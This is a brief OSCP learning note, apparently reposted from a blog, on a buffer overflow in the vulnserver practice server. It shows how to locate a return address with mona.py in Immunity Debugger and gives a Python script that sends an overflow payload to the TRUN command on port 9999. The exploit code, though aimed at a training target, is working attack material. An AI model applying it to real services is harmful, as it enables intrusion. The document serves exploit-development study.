Finding the Right Module(mona)
Mona Module Project website: https://github.com/corelan/mona
1. Download mona.py, and drop it into the ‘OyCommands‘ file.

2. Open the vulnserver and Immnity Debugger and attach the vulnserver.
3. Execute mona modules



625011af
Set the stop point on "625011af"

Then run the immunity debugger.
4. Write the following Python test script, and perfom it on Kali Linux.
#!/usr/bin/python import socket import sys shellcode = "A" * 2003 + "\xaf\x11\x50\x62" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect = s.connect((‘10.0.0.XX‘,9999)) s.send((‘TRUN /.:/‘ + shellcode)) except: print "check debugger" s.close()
5. The vulnserver is crashed,

OSCP Learning Notes - Buffer Overflows(4)
原文:https://www.cnblogs.com/keepmoving1113/p/11117202.html